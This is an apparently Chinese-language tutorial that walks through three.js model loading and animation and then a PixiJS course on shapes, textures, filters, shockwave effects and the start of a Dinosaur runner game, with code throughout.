• function createMeshes() {}: using import { createGeometries } from './geometries.js'; and import { createMaterials } from './materials.js';, adjusts each component's transform and assembles the little train.
    import { Mesh } from 'three';

    import { createGeometries } from './geometries.js';
    import { createMaterials } from './materials.js';

    function createMeshes() {
    const geometries = createGeometries();
    const materials = createMaterials();

    const cabin = new Mesh(geometries.cabin, materials.body);
    cabin.position.set(1.5, 1.4, 0);

    const chimney = new Mesh(geometries.chimney, materials.detail);
    chimney.position.set(-2, 1.9, 0);

    const nose = new Mesh(geometries.nose, materials.body);
    nose.position.set(-1, 1, 0);
    nose.rotation.z = Math.PI / 2;

    const smallWheelRear = new Mesh(geometries.wheel, materials.detail);
    smallWheelRear.position.y = 0.5;
    smallWheelRear.rotation.x = Math.PI / 2;

    const smallWheelCenter = smallWheelRear.clone();
    smallWheelCenter.position.x = -1;

    const smallWheelFront = smallWheelRear.clone();
    smallWheelFront.position.x = -2;

    const bigWheel = smallWheelRear.clone();
    bigWheel.position.set(1.5, 0.9, 0);
    bigWheel.scale.set(2, 1.25, 2);

    return {
    nose,
    cabin,
    chimney,
    smallWheelRear,
    smallWheelCenter,
    smallWheelFront,
    bigWheel,
    };
    }

    export { createMeshes };

Demo

1.13 Loading 3D Models in glTF Format

Over the last thirty years or so there have been many attempts to create a standard 3D asset exchange format. Until recently, FBX, OBJ (Wavefront), and DAE (Collada) were the most popular of these, although they all have problems that prevented widespread adoption: OBJ does not support animation, FBX is a closed format belonging to Autodesk, and the Collada spec is so complex that large files become hard to load.

Recently, however, a newcomer called glTF has become the de facto standard format for exchanging 3D assets on the web. glTF (GL Transmission Format), sometimes called the JPEG of 3D, was created by the Khronos Group, who are responsible for WebGL, OpenGL, and a whole host of other graphics APIs. First released in 2017, glTF is now the best format for exchanging 3D assets on the web and in many other fields. This book uses glTF throughout, and if possible you should too: it is designed for sharing models on the web, so file sizes are as small as possible and your models load quickly.

However, since glTF is relatively new, your favorite application may not have an exporter yet. In that case, you can convert models to glTF before using them, or use another loader such as FBXLoader or OBJLoader. All three.js loaders work the same way, so if you do need another loader, everything in this chapter still applies, with only minor differences.

The original text strongly recommends the .glb format; fine, I'll go along with that.

    Loader

As you can see, three.js supports loaders for many file formats. We use GLTFLoader.js, which also needs the dependency '../utils/BufferGeometryUtils.js'.

If loading locally, you should also adjust its relative import path:

    import {XXX} from '../../../build/three.module.js';

The file structure is as follows:

• assets/models: holds the 3D models (.glb format).
• src/World/components/birds/
  • birds.js: imports the models and creates the bird objects.
  • setupModel.js: processes the loaded data.

File structure

• await world.init(); waits for the models to finish loading before rendering starts.
    import { World } from './World/World.js';

    async function main() {
    // Get a reference to the container element
    const container = document.querySelector('#scene-container');

    // create a new world
    const world = new World(container);

    // complete async tasks
    await world.init();

    // start the animation loop
    world.start();
    }

    main().catch((err) => {
    console.error(err);
    });
• async init() {}: waits for the models to finish loading before rendering starts.
  • const { parrot, flamingo, stork } = await loadBirds(); loads the models asynchronously.
  • controls.target.copy(parrot.position); sets the controls' target to the position of the parrot model. This is typically used so the camera orbits around, and stays focused on, that point.
  • scene.add(parrot, flamingo, stork); adds the three birds to the scene.
    import { loadBirds } from './components/birds/birds.js';
    import { createCamera } from './components/camera.js';
    import { createLights } from './components/lights.js';
    import { createScene } from './components/scene.js';

    import { createControls } from './systems/controls.js';
    import { createRenderer } from './systems/renderer.js';
    import { Resizer } from './systems/Resizer.js';
    import { Loop } from './systems/Loop.js';

    let camera;
    let controls;
    let renderer;
    let scene;
    let loop;

    class World {
    constructor(container) {
    camera = createCamera();
    renderer = createRenderer();
    scene = createScene();
    loop = new Loop(camera, scene, renderer);
    container.append(renderer.domElement);
    controls = createControls(camera, renderer.domElement);

    const { ambientLight, mainLight } = createLights();

    loop.updatables.push(controls);
    scene.add(ambientLight, mainLight);

    const resizer = new Resizer(container, camera, renderer);
    }

    async init() {
    const { parrot, flamingo, stork } = await loadBirds();

    // move the target to the center of the front bird
    controls.target.copy(parrot.position);

    scene.add(parrot, flamingo, stork);
    }

    render() {
    renderer.render(scene, camera);
    }

    start() {
    loop.start();
    }

    stop() {
    loop.stop();
    }
    }

    export { World };

Flamingo

Opening this .glb model in Blender shows the Mesh_0 node sitting under Object_0. We only need the Mesh_0 node, so pick it out:

    function setupModel(data) {
    const model = data.scene.children[0];

    return model;
    }

    export { setupModel };
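
If the model's hierarchy were deeper, looking the node up by name would be more robust than relying on child order (a sketch; the name 'Mesh_0' is taken from the Blender screenshot and may differ per asset):

// inside setupModel: select the mesh by name instead of by child index
const model = data.scene.getObjectByName('Mesh_0');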
• async function loadBirds() {}: loads asynchronously.

  • const loader = new GLTFLoader(); gives the program the ability to load .glb files.

  • const [parrotData, flamingoData, storkData] = await Promise.all([...]); loads the models asynchronously.

  • const parrot = setupModel(parrotData); creates the parrot object.

  • parrot.position.set(0, 0, 2.5); sets the object's position.

    import { GLTFLoader } from 'three/examples/jsm/loaders/GLTFLoader.js';

    import { setupModel } from './setupModel.js';

    async function loadBirds() {
    const loader = new GLTFLoader();

    const [parrotData, flamingoData, storkData] = await Promise.all([
    loader.loadAsync('assets/models/Parrot.glb'),
    loader.loadAsync('assets/models/Flamingo.glb'),
    loader.loadAsync('assets/models/Stork.glb'),
    ]);

    console.log('Squaaawk!', parrotData);

    const parrot = setupModel(parrotData);
    parrot.position.set(0, 0, 2.5);

    const flamingo = setupModel(flamingoData);
    flamingo.position.set(7.5, 0, -10);

    const stork = setupModel(storkData);
    stork.position.set(0, -2.5, -10);

    return {
    parrot,
    flamingo,
    stork,
    };
    }

    export { loadBirds };

Demo

Trying my own model:

Export a model created earlier in Blender to the .glb format:

Girl with a Pearl Earring

For the code, just follow the same recipe!

Demo

1.14 The three.js Animation System

Creating an animation involves three elements: keyframes, KeyframeTrack, and AnimationClip.

The lowest conceptual level in the animation system is the keyframe. Each keyframe consists of three pieces of information: time, property, and value.

There is no class representing a single keyframe. Instead, keyframes are raw data stored in two arrays, times and values, inside a KeyframeTrack.

Create a number keyframe track representing opacity, containing five keyframes:

    import { NumberKeyframeTrack } from "three";

    const times = [0, 1, 2, 3, 4];
    const values = [0, 1, 0, 1, 0];

    const opacityKF = new NumberKeyframeTrack(".material.opacity", times, values);

Create a vector keyframe track representing position, containing three keyframes (each group of three values is one (x, y, z) position):

    import { VectorKeyframeTrack } from "three";

    const times = [0, 3, 6];
    const values = [0, 0, 0, 2, 2, 2, 0, 0, 0];

    const positionKF = new VectorKeyframeTrack(".position", times, values);

An animation clip is a collection of any number of keyframe tracks attached to a single object; the class representing a clip is AnimationClip.

A clip animating position and opacity:

    import { AnimationClip, NumberKeyframeTrack, VectorKeyframeTrack } from "three";

    const positionKF = new VectorKeyframeTrack(
    ".position",
    [0, 3, 6],
    [0, 0, 0, 2, 2, 2, 0, 0, 0]
    );

    const opacityKF = new NumberKeyframeTrack(
    ".material.opacity",
    [0, 1, 2, 3, 4, 5, 6],
    [0, 1, 0, 1, 0, 1, 0]
    );

    const moveBlinkClip = new AnimationClip("move-n-blink", -1, [
    positionKF,
    opacityKF,
    ]);
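
To actually play moveBlinkClip on an object, bind it through an AnimationMixer and update the mixer every frame, mirroring the Loop convention used earlier (a sketch; mesh stands in for any mesh with a transparent material):

import { AnimationMixer } from 'three';

const mixer = new AnimationMixer(mesh);
const action = mixer.clipAction(moveBlinkClip);
action.play();

// advance the animation each frame, exactly as the bird models do below
mesh.tick = (delta) => mixer.update(delta);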

• loop.updatables.push(parrot, flamingo, stork); adds parrot, flamingo, and stork to the Loop so their animations play.
    import { loadBirds } from './components/birds/birds.js';
    import { createCamera } from './components/camera.js';
    import { createLights } from './components/lights.js';
    import { createScene } from './components/scene.js';

    import { createControls } from './systems/controls.js';
    import { createRenderer } from './systems/renderer.js';
    import { Resizer } from './systems/Resizer.js';
    import { Loop } from './systems/Loop.js';

    let camera;
    let controls;
    let renderer;
    let scene;
    let loop;

    class World {
    constructor(container) {
    camera = createCamera();
    renderer = createRenderer();
    scene = createScene();
    loop = new Loop(camera, scene, renderer);
    container.append(renderer.domElement);
    controls = createControls(camera, renderer.domElement);

    const { ambientLight, mainLight } = createLights();

    loop.updatables.push(controls);
    scene.add(ambientLight, mainLight);

    const resizer = new Resizer(container, camera, renderer);
    }

    async init() {
    const { parrot, flamingo, stork } = await loadBirds();

    // move the target to the center of the front bird
    controls.target.copy(parrot.position);

    loop.updatables.push(parrot, flamingo, stork);
    scene.add(parrot, flamingo, stork);
    }

    render() {
    renderer.render(scene, camera);
    }

    start() {
    loop.start();
    }

    stop() {
    loop.stop();
    }
    }

    export { World };
• const clip = data.animations[0]; grabs the first animation (animations[0]) from data and stores it in clip.
• const mixer = new AnimationMixer(model); creates an AnimationMixer for the model we just fetched; this instance manages the model's animations.
• const action = mixer.clipAction(clip); uses mixer.clipAction(clip) to create an animation action for this particular clip.
• action.play(); starts playing the animation.
• model.tick = (delta) => mixer.update(delta); updates the animation.
    import { AnimationMixer } from 'three';

    function setupModel(data) {
    const model = data.scene.children[0];
    const clip = data.animations[0];

    const mixer = new AnimationMixer(model);
    const action = mixer.clipAction(clip);
    action.play();

    model.tick = (delta) => mixer.update(delta);

    return model;
    }

    export { setupModel };
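
If a file contains several clips, the same pattern extends naturally (a sketch; which clips exist depends on the asset):

const mixer = new AnimationMixer(model);
for (const clip of data.animations) {
  mixer.clipAction(clip).play();
}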

Demo

Resources

Course

01 - Getting to Know Pixi and Setting Up a Pixi App

• Install the Vue CLI globally:
npm install -g @vue/cli
• Install yarn globally:
npm install -g yarn
• Create a Vue project from the command line in your projects folder (good grief, that's about 100 MB...):
vue create 01-pixiapp

Creating the Vue project

• Switch into the project:
cd 01-pixiapp
• Install pixi.js:
yarn add pixi.js
• Start the project:
yarn serve

Starting the dev server


• Edit 01-pixiapp/App.vue:
<template>
  <div></div>
</template>

<script setup>
// import pixi.js
import * as PIXI from 'pixi.js';

// create the application
const app = new PIXI.Application({
  width: window.innerWidth,
  height: window.innerHeight,
  backgroundColor: 0x1099bb,
  resolution: window.devicePixelRatio || 1,
})

// add the application's canvas to the DOM
document.body.appendChild(app.view);

// create a rectangle
const rectangle = new PIXI.Graphics();
rectangle.beginFill(0x66ccff); // fill color
rectangle.drawRect(200, 200, 164, 64); // draw the rectangle
rectangle.endFill(); // end the fill

// add the rectangle to the stage
app.stage.addChild(rectangle);

</script>

<style>
* {
  margin: 0;
  padding: 0;
  box-sizing: border-box;
}
canvas {
  width: 100vw;
  height: 100vh;
  position: fixed;
  left: 0;
}
</style>

In plain HTML, import pixi.js directly with <script src="https://pixijs.download/release/pixi.js"></script>:

<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Document</title>
  <style>
    * {
      margin: 0;
      padding: 0;
      box-sizing: border-box;
    }
    canvas {
      width: 100vw;
      height: 100vh;
      position: fixed;
      left: 0;
    }
  </style>
</head>
<body>
</body>
<script src="https://pixijs.download/release/pixi.js"></script>
<script>
  // create the application
  const app = new PIXI.Application({
    width: window.innerWidth,
    height: window.innerHeight,
    backgroundColor: 0x1099bb,
    resolution: window.devicePixelRatio || 1,
  })

  // add the application's canvas to the DOM
  document.body.appendChild(app.view);

  // create a rectangle
  const rectangle = new PIXI.Graphics();
  rectangle.beginFill(0x66ccff); // fill color
  rectangle.drawRect(200, 200, 164, 64); // draw the rectangle
  rectangle.endFill(); // end the fill

  // add the rectangle to the stage
  app.stage.addChild(rectangle);
</script>
</html>

Explanation of the Vue code:

This part defines the component's HTML structure. In this example the template contains only an empty <div>. The <div> is not actually used here, because the PixiJS canvas is appended directly to document.body by the script, rather than being inserted into this <div>.

    <template>
    <div></div>
    </template>

This part is the component's JavaScript logic, which mainly does the following:

1. Import PixiJS: import the PixiJS library with an import statement.
2. Create the PixiJS application: instantiate a new PixiJS Application object and set properties such as its size and background color. This application object automatically creates a <canvas> element.
3. Add the <canvas> element to the DOM: document.body.appendChild(app.view); appends the <canvas> PixiJS created to the document's <body>.
4. Draw a shape: use PixiJS's Graphics class to create a rectangle, set its fill color and position, and finally add the rectangle to the PixiJS application's stage so it is displayed.
<script setup>
// import pixi.js
import * as PIXI from 'pixi.js';

// create the application
const app = new PIXI.Application({
  width: window.innerWidth, // width set to the window width
  height: window.innerHeight, // height set to the window height
  backgroundColor: 0x1099bb, // background color set to light blue
  resolution: window.devicePixelRatio || 1, // resolution set to the device pixel ratio, defaulting to 1
})

// add the application's canvas to the DOM
document.body.appendChild(app.view);

// create a rectangle
const rectangle = new PIXI.Graphics();
rectangle.beginFill(0x66ccff); // start a light blue fill
rectangle.drawRect(200, 200, 164, 64); // draw a 164 x 64 rectangle at (200, 200)
rectangle.endFill(); // end the fill

// add the rectangle to the stage
app.stage.addChild(rectangle);
</script>

This part defines the page's CSS:

• Reset margin and padding on all elements and set box-sizing to border-box to keep the layout consistent.
• Style the <canvas> element so its width and height fill the viewport, and use position: fixed so the <canvas> always covers the whole viewport.
    <style>
    * {
    margin: 0;
    padding: 0;
    box-sizing: border-box;
    }
    canvas {
    width: 100vw;
    height: 100vh;
    position: fixed;
    left: 0;
    }
    </style>

Open http://localhost:8080/:

Rendered result

02 - Pixi Graphics in Practice

Create other shapes with Pixi, and set:

• Scale: scale.set()
• Translation: position.set()
• Rotation: rotation
• Pivot: pivot.set()
// create the application
const app = new PIXI.Application({
  width: window.innerWidth,
  height: window.innerHeight,
  backgroundColor: 0x1099bb,
  resolution: window.devicePixelRatio || 1,
  antialias: true, // enable anti-aliasing
})

// add the application's canvas to the DOM
document.body.appendChild(app.view);

// create a rectangle
const rectangle = new PIXI.Graphics();
rectangle.lineStyle(4, 0xff0000, 1); // border style: line width, color, alpha
rectangle.beginFill(0x66ccff, 0.9); // fill color
rectangle.drawRect(0, 0, 164, 64); // draw the rectangle
rectangle.endFill(); // end the fill

// scale the shape
rectangle.scale.set(2, 2);
// translate the shape
rectangle.position.set(100, 100);
// rotate the shape
rectangle.rotation = 0.5;
// set the shape's pivot
rectangle.pivot.set(82, 32);

// add the rectangle to the stage
app.stage.addChild(rectangle);

// create a circle
const circle = new PIXI.Graphics();
circle.beginFill(0x66ccff, 0.9);
circle.drawCircle(0, 0, 32);
circle.endFill();
circle.position.set(300, 300);
app.stage.addChild(circle);

03 - Drawing Common Shapes with Pixi

// create a rectangle
const rectangle = new PIXI.Graphics();
rectangle.lineStyle(4, 0xff0000, 1); // border style: line width, color, alpha
rectangle.beginFill(0x66ccff, 0.9); // fill color
rectangle.drawRect(0, 0, 164, 64); // draw the rectangle
rectangle.endFill(); // end the fill
// scale the shape
rectangle.scale.set(2, 2);
// translate the shape
rectangle.position.set(100, 100);
// rotate the shape
rectangle.rotation = 0.5;
// set the shape's pivot
rectangle.pivot.set(82, 32);
// add the rectangle to the stage
app.stage.addChild(rectangle);
// create a circle
const circle = new PIXI.Graphics();
circle.beginFill(0x66ccff, 0.9);
circle.drawCircle(0, 0, 32);
circle.endFill();
circle.position.set(300, 300);
app.stage.addChild(circle);
// create a rounded rectangle
const roundedRectangle = new PIXI.Graphics();
roundedRectangle.beginFill(0x66ccff, 0.9);
/* draw a rounded rectangle:
   the first parameter is the x coordinate,
   the second is the y coordinate,
   the third is the width,
   the fourth is the height,
   the fifth is the corner radius
*/
roundedRectangle.drawRoundedRect(0, 0, 164, 64, 10);
roundedRectangle.endFill();
roundedRectangle.position.set(500, 500);
app.stage.addChild(roundedRectangle);
// draw an ellipse
const ellipse = new PIXI.Graphics();
ellipse.beginFill(0x66ccff, 0.9);
/* draw an ellipse:
   the first parameter is the x coordinate,
   the second is the y coordinate,
   the third is the width,
   the fourth is the height
*/
ellipse.drawEllipse(0, 0, 164, 164);
ellipse.endFill();
ellipse.position.set(700, 700);
app.stage.addChild(ellipse);
// draw a polygon
const polygon = new PIXI.Graphics();
polygon.beginFill(0x66ccff, 0.9);
// draw a polygon; the argument is an array of coordinates, taken pairwise as each point's x and y
polygon.drawPolygon([0, 0, 100, 0, 100, 100, 0, 100]);
polygon.endFill();
polygon.position.set(50, 300);
app.stage.addChild(polygon);
// draw an arc (a fan shape)
const arc = new PIXI.Graphics();
arc.beginFill(0x660000, 0.9);
/* draw an arc:
   the first parameter is the x coordinate,
   the second is the y coordinate,
   the third is the radius,
   the fourth is the start angle,
   the fifth is the end angle,
   the sixth is whether to draw counterclockwise
*/
arc.arc(0, 0, 32, 0, Math.PI, false);
arc.endFill();
arc.position.set(300, 50);
app.stage.addChild(arc);
// draw line segments
const line = new PIXI.Graphics();
line.lineStyle(4, 0xff0000, 1);
line.moveTo(0, 0); // the start point of the line
line.lineTo(100, 100); // the end point of the first segment
line.lineTo(200, 0);
line.position.set(500, 50);
app.stage.addChild(line);

Rendered result

04 - Pixi Textures and Animation

Create a spinning wooden-sword animation in code:

// create the application
const app = new PIXI.Application({
  width: window.innerWidth,
  height: window.innerHeight,
  backgroundColor: 0x1099bb,
  resolution: window.devicePixelRatio || 1,
  antialias: true, // enable anti-aliasing
})

// add the application's canvas to the DOM
document.body.appendChild(app.view);

// create a texture
const texture = PIXI.Texture.from("./textures/mujian.png");

// create a sprite
const sprite = new PIXI.Sprite(texture);

// set the sprite's anchor
sprite.anchor.set(0.5, 0.5);

// set the sprite's position
sprite.x = app.screen.width / 2;
sprite.y = app.screen.height / 2;

// rotate the sprite by 45 degrees
sprite.rotation = Math.PI / 4;

// set the sprite's scale
sprite.scale.set(2, 2);

// set the sprite's alpha
sprite.alpha = 0.5;

app.stage.addChild(sprite);

// animate with the ticker
app.ticker.add((delta) => {
  console.log(delta);
  sprite.rotation += 0.01 * delta;
})
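
Note that the ticker's delta is a frame-rate-scaled factor (roughly 1.0 at 60 FPS), not seconds. To rotate at a fixed speed per second, you can use the elapsed milliseconds instead (a sketch using the same app and sprite as above):

app.ticker.add(() => {
  // elapsedMS is the real duration of the last frame, in milliseconds
  const seconds = app.ticker.elapsedMS / 1000;
  sprite.rotation += Math.PI * 0.25 * seconds; // 45 degrees per second
});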

Demo

05 - Pixi Event Interaction

Building on the previous section's code, add interaction:

sprite.interactive = true;
sprite.on("click", () => {
  sprite.alpha = 1;
});
sprite.on("pointerenter", () => {
  sprite.alpha = 0.75;
});
sprite.on("pointerout", () => {
  sprite.alpha = 0.5;
});

As shown below, clicking on, hovering over, or moving off the wooden sword triggers the corresponding effect.

Demo

06 - Pixi Asset Management

Two different ways to load assets:

// register assets
PIXI.Assets.add("sword", "./textures/jian.png");
PIXI.Assets.add("man", "./textures/man.png");
PIXI.Assets.add("woodenSword", "./textures/mujian.png");

// load the assets asynchronously
const texturesPromise = PIXI.Assets.load(["sword", "man", "woodenSword"], (progress) => {
  console.log("loaded:", progress);
});

// alternatively: register the scene-one assets as a bundle
PIXI.Assets.addBundle("scene1", {
  sword: "./textures/jian.png",
  man: "./textures/man.png",
  woodenSword: "./textures/mujian.png",
});

const texturesPromise = PIXI.Assets.loadBundle("scene1", (progress) => {
  console.log("loaded:", progress);
});
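
Since PIXI.Assets.loadBundle returns a promise, an async/await form is equivalent to the .then() chain used below (a sketch assuming the same bundle registration as above):

async function loadScene1() {
  // identical to the .then() version, just flattened with await
  const textures = await PIXI.Assets.loadBundle("scene1", (progress) => {
    console.log("loaded:", progress);
  });
  return textures;
}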

Now work with the texturesPromise object we created:

// once loading completes, create the sprites
texturesPromise.then((textures) => {
  // create a container
  const container = new PIXI.Container();
  // create a sprite
  const sprite = new PIXI.Sprite(textures.sword);
  // set the sprite's position
  sprite.x = app.screen.width / 2;
  sprite.y = app.screen.height / 2;
  // set the sprite's anchor
  sprite.anchor.set(0.5);
  // set the sprite's scale
  sprite.scale.set(0.5);
  // set the sprite's alpha
  sprite.alpha = 0.5;
  // set the sprite's rotation
  sprite.rotation = 0.5;
  // set the sprite's blend mode
  sprite.blendMode = PIXI.BLEND_MODES.ADD;
  // make the sprite interactive
  sprite.interactive = true;
  // show a pointer cursor over the sprite
  sprite.buttonMode = true;
  // attach a pointer event to the sprite
  sprite.on("pointerdown", () => {
    console.log("pointerdown");
  });
  container.addChild(sprite);

  // create another sprite
  const sprite2 = new PIXI.Sprite(textures.man);
  sprite2.scale.set(0.1);
  container.addChild(sprite2);
  app.stage.addChild(container);
});

Demo

07 - Pixi Text and Masks

Create a text object with new PIXI.Text():

// display the text "Hello World"
const text = new PIXI.Text("Hello World", {
  fontFamily: "Arial",
  fontSize: 120,
  fill: 0xff0000,
  align: "center",
});

// set the text's position
text.x = app.screen.width / 2;
text.y = app.screen.height / 2;

// set the text's anchor
text.anchor.set(0.5);
app.stage.addChild(text);

Demo

Use mask to mask a sprite with another sprite:

// create a background sprite
const bg = PIXI.Sprite.from("./textures/bg.png");
bg.width = app.screen.width;
bg.height = app.screen.height;
// use the wooden-sword sprite (created earlier) as the background's mask
bg.mask = woodenSword;
app.stage.addChild(bg);
app.stage.addChild(woodenSword);

Demo

Using text as the mask:

// display the text "Hello World"
const text = new PIXI.Text("Hello World", {
  fontFamily: "Arial",
  fontSize: 120,
  fill: 0xff0000,
  align: "center",
});

// set the text's position
text.x = app.screen.width / 2;
text.y = app.screen.height / 2;

// set the text's anchor
text.anchor.set(0.5);

// create a background sprite
const bg = PIXI.Sprite.from("./textures/bg.png");
bg.width = app.screen.width;
bg.height = app.screen.height;
// use the text as the sprite's mask
bg.mask = text;
app.stage.addChild(bg);

Demo

08 - Pixi Filter Effects

First create a sprite to experiment on:

// create a texture
const texture = PIXI.Texture.from("./textures/mujian.png");
// create a sprite
const sprite = new PIXI.Sprite(texture);
// set the sprite's position
sprite.x = app.screen.width / 2;
sprite.y = app.screen.height / 2;

// set the sprite's anchor
sprite.anchor.set(0.5);

// add the sprite to the stage
app.stage.addChild(sprite);

Built-in filter: blur

// create a blur filter
const blurFilter = new PIXI.BlurFilter();
// set the filter's blur strength
blurFilter.blur = 20;
// attach the blur filter to the sprite
sprite.filters = [blurFilter];

// track whether the pointer is over the sprite
sprite.interactive = true;
sprite.on("pointerover", () => {
  // remove the blur
  blurFilter.blur = 0;
});
sprite.on("pointerout", () => {
  // restore the blur
  blurFilter.blur = 20;
});

Demo

pixi-filters: extension filters for outline and glow

To use them, install with

yarn add pixi-filters

and then import with

import {XXXFilter} from "pixi-filters";

In Vue, the code looks like this:

<template>
  <div></div>
</template>

<script setup>
// import pixi.js
import * as PIXI from 'pixi.js';
import {OutlineFilter} from 'pixi-filters';
import {GlowFilter} from 'pixi-filters';

// create the application
const app = new PIXI.Application({
  width: window.innerWidth,
  height: window.innerHeight,
  backgroundColor: 0x1099bb,
  resolution: window.devicePixelRatio || 1,
  antialias: true, // enable anti-aliasing
})

// add the application's canvas to the DOM
document.body.appendChild(app.view);

// create a texture
const texture = PIXI.Texture.from("./textures/mujian.png");
// create a sprite
const sprite = new PIXI.Sprite(texture);
// set the sprite's position
sprite.x = app.screen.width / 2;
sprite.y = app.screen.height / 2;

// set the sprite's anchor
sprite.anchor.set(0.5);

// add the sprite to the stage
app.stage.addChild(sprite);

// create an outline filter
const outlineFilter = new OutlineFilter(5, 0xffff00); // 5 is the outline width, 0xffff00 the outline color
// create a glow filter
const glowFilter = new GlowFilter({
  distance: 50,
  outerStrength: 1,
  innerStrength: 0,
  color: 0xff0000,
  quality: 0.5,
});
// attach both filters to the sprite
sprite.filters = [outlineFilter, glowFilter];

</script>

<style>
* {
  margin: 0;
  padding: 0;
  box-sizing: border-box;
}
canvas {
  width: 100vw;
  height: 100vh;
  position: fixed;
  left: 0;
}
</style>
<script src="https://cdn.jsdelivr.net/npm/pixi-filters@latest/dist/browser/pixi-filters.min.js"></script>

In plain HTML, use the following (replacing OutlineFilter and GlowFilter with new PIXI.filters.OutlineFilter and PIXI.filters.GlowFilter respectively, loaded via the script tag above):

// create the application
const app = new PIXI.Application({
  width: window.innerWidth,
  height: window.innerHeight,
  backgroundColor: 0x1099bb,
  resolution: window.devicePixelRatio || 1,
  antialias: true, // enable anti-aliasing
})

// add the application's canvas to the DOM
document.body.appendChild(app.view);

// create a texture
const texture = PIXI.Texture.from("./textures/mujian.png");
// create a sprite
const sprite = new PIXI.Sprite(texture);
// set the sprite's position
sprite.x = app.screen.width / 2;
sprite.y = app.screen.height / 2;

// set the sprite's anchor
sprite.anchor.set(0.5);

// add the sprite to the stage
app.stage.addChild(sprite);

// create an outline filter
const outlineFilter = new PIXI.filters.OutlineFilter(5, 0xffff00); // 5 is the outline width, 0xffff00 the outline color
// create a glow filter
const glowFilter = new PIXI.filters.GlowFilter({
  distance: 50,
  outerStrength: 1,
  innerStrength: 0,
  color: 0xff0000,
  quality: 0.5,
});
// attach the filters to the sprite
sprite.filters = [outlineFilter, glowFilter];

Demo

09 - A Wave and Water-Drop Effect Homepage with Pixi

Create the scene: a background plus a text object with a drop shadow.

// create the application
const app = new PIXI.Application({
  width: window.innerWidth,
  height: window.innerHeight,
  backgroundColor: 0x1099bb,
  resolution: window.devicePixelRatio || 1,
  antialias: true, // enable anti-aliasing
});

// add the application's canvas to the DOM
document.body.appendChild(app.view);

// create a texture
const texture = PIXI.Texture.from("./textures/car.jpg");
// create a sprite
const sprite = new PIXI.Sprite(texture);
sprite.width = app.screen.width;
sprite.height = app.screen.height;

// create a container
const container = new PIXI.Container();
// add the sprite to the container
container.addChild(sprite);
// add the container to the stage
app.stage.addChild(container);

// add the text
const text = new PIXI.Text("Hello PixiJS", {
  fontFamily: "Arial",
  fontSize: 30 + Math.floor(app.screen.width * 0.1),
  fill: 0xffffff,
  align: "center",
  dropShadow: true,
  dropShadowColor: "#000000",
  dropShadowBlur: 4,
  dropShadowAngle: Math.PI / 2,
  dropShadowDistance: 2,
});
text.x = app.screen.width / 2;
text.y = app.screen.height / 2;
text.anchor.set(0.5);
container.addChild(text);

    09_1

    ​ 添加置换滤镜:

    // 添加置换滤镜
    const displacementSprite = PIXI.Sprite.from("./textures/displacement.jpg");
    displacementSprite.scale.set(0.5);
    displacementSprite.texture.baseTexture.wrapMode = PIXI.WRAP_MODES.REPEAT;
    const displacementFilter = new PIXI.DisplacementFilter(displacementSprite);
    container.addChild(displacementSprite);

    ​ 一个置换图 displacement.jpg 实现画面涟漪的效果:

    displacement.jpg

    ​ 定义大、中、小三种震波滤镜(需要pixi-filter 支持):

    // 添加震波滤镜
    const shockwaveFilter1 = new PIXI.filters.ShockwaveFilter(
    [Math.random() * app.screen.width, Math.random() * app.screen.height],
    {
    radius: 80, //半径
    waveLength: 40, //波长
    amplitude: 40, //振幅
    speed: 200,
    },
    0
    );

    const shockwaveFilter2 = new PIXI.filters.ShockwaveFilter(
    [Math.random() * app.screen.width, Math.random() * app.screen.height],
    {
    radius: 100, //半径
    waveLength: 45, //波长
    amplitude: 80, //振幅
    speed: 240,
    },
    0
    );

    const shockwaveFilter3 = new PIXI.filters.ShockwaveFilter(
    [Math.random() * app.screen.width, Math.random() * app.screen.height],
    {
    radius: 160, //半径
    waveLength: 65, //波长
    amplitude: 105, //振幅
    speed: 300,
    },
    0
    );

    ​ 应用这些滤镜(app.ticker.add 有点像 Unity 里的 Update()):

    container.filters = [
    displacementFilter,
    shockwaveFilter1,
    shockwaveFilter2,
    shockwaveFilter3,
    ];

    ​ 随机创建震波滤镜:

    app.ticker.add((delta) => {
    displacementSprite.x += 1;
    displacementSprite.y += 1;
    createWave(shockwaveFilter1, 1);
    createWave(shockwaveFilter2, 1.2);
    createWave(shockwaveFilter3, 0.7);
    });

    function createWave(waveFilter, resetTime) {
    waveFilter.time += 0.01;
    if (waveFilter.time > resetTime) {
    waveFilter.time = 0;
    waveFilter.center = [
    Math.random() * app.screen.width,
    Math.random() * app.screen.height,
    ];
    }
    }

    ​ 设置点击创建震波滤镜的效果:

    // 监听点击事件,根据位置创建震波滤镜
    app.view.addEventListener("click", (e) => {
    console.log(e.clientX, e.clientY);
    shockwaveFilter3.center = [e.clientX, e.clientY];
    shockwaveFilter3.time = 0;
    });

    演示

    10-pixijs开发谷歌恐龙跑酷小游戏

    ​ 我在原教程的基础上魔改了一些内容。

    ​ 创建应用,导入 baseTexture(是一个雪碧图):

    雪碧图

    // 创建应用
    const app = new PIXI.Application({
    width: window.innerWidth,
    height: window.innerHeight,
    backgroundColor: 0xffffff,
    resolution: window.devicePixelRatio || 1,
    antialias: true, // 抗锯齿
    });

    // 将应用画布添加到DOM中
    document.body.appendChild(app.view);

    // 创建容器
    const container = new PIXI.Container();

    // 将容器添加到舞台
    app.stage.addChild(container);

    // 添加恐龙小游戏的精灵纹理
    const baseTexture = PIXI.BaseTexture.from("./textures/game.png");

    ​ 设置恐龙的宽高:

    const frameWidth = 88;
    const frameHeight = 100;

    ​ 创建各种资源:

    // 创建恐龙纹理
    const dinoTexture = new PIXI.Texture(
    baseTexture,
    new PIXI.Rectangle(75, 0, frameWidth, frameHeight)
    );
    // 创建恐龙精灵
    const dino = new PIXI.Sprite(dinoTexture);
    dino.visible = false;
    container.addChild(dino);
    // 恐龙跑步动画;
    const runTexture = new PIXI.Texture(
    baseTexture,
    new PIXI.Rectangle(1675, 0, frameWidth, frameHeight)
    );
    const runSprite = new PIXI.Sprite(runTexture);
    runSprite.visible = false;
    container.addChild(runSprite);

    let runTextures = [];
    for (let i = 0; i < 2; i++) {
    runTextures.push(
    new PIXI.Texture(
    baseTexture,
    new PIXI.Rectangle(1680 + (2 + i) * frameWidth, 0, 82, frameHeight)
    )
    );
    }
    const runAnimation = new PIXI.AnimatedSprite(runTextures);
    runAnimation.animationSpeed = 0.1;
    runAnimation.play();
    runAnimation.visible = false;
    container.addChild(runAnimation);
    // 恐龙死亡动画;
    let deadTextures = [];
    for (let i = 0; i < 2; i++) {
    deadTextures.push(
    new PIXI.Texture(
    baseTexture,
    new PIXI.Rectangle(1680 + (0 + i) * frameWidth, 0, 82, frameHeight)
    )
    );
    }
